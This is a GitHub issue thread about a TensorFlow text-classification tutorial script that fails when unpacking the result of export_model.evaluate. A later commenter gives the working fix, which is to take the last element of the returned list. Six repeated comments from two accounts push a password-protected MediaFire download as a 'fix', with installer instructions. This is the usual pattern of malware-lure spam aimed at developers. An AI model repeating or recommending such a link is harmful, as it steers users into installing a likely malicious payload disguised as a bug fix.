### ISSUE TITLE
Can't run text_classification.py

### ISSUE THREAD

**Issue by snowuyl** [tensorflow/tensorflow#74564]
### Issue type

Bug

### Have you reproduced the bug with TensorFlow Nightly?

Yes

### Source

binary

### TensorFlow version

2.17.0

### Custom code

No

### OS platform and distribution

Linux Ubuntu v22.04

### Python version

3.10.12

### Current behavior?

Can't run text_classification.py due to the following error.
Traceback (most recent call last):
  File "/home/snowuyl/samba/workspace_Python/TensorFlow/NLP/Text/text_classification.py", line 209, in <module>
    loss, accuracy = export_model.evaluate(raw_test_ds)
ValueError: too many values to unpack (expected 2)

### Standalone code to reproduce the issue

```shell
You can reproduce this issue by the following procedures.
1. wget https://raw.githubusercontent.com/tensorflow/docs/master/site/en/tutorials/keras/text_classification.ipynb
2. jupyter nbconvert --to script text_classification.ipynb 
3. mv text_classification.txt text_classification.py
4. python3 text_classification.py
```

### Relevant log output

```shell
782/782 ━━━━━━━━━━━━━━━━━━━━ 6s 6ms/step - accuracy: 0.5032 - binary_accuracy: 0.0000e+00 - loss: 0.0000e+00    
Traceback (most recent call last):
  File "/home/snowuyl/samba/workspace_Python/TensorFlow/NLP/Text/text_classification.py", line 209, in <module>
    loss, accuracy = export_model.evaluate(raw_test_ds)
ValueError: too many values to unpack (expected 2)
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mihaimaruseac** [comment]
Should be in docs?

**Comment by sanskarmodi8** [comment]
I looked into the issue and found out that after the evaluation you are getting a list of size 4 where only the last one is the accuracy of the export_model. You can change the line `loss, accuracy = export_model.evaluate(raw_test_ds)` with the below line -
`accuracy = export_model.evaluate(raw_test_ds)[-1]`

**Comment by snowuyl** [comment]
Thanks for your reply!
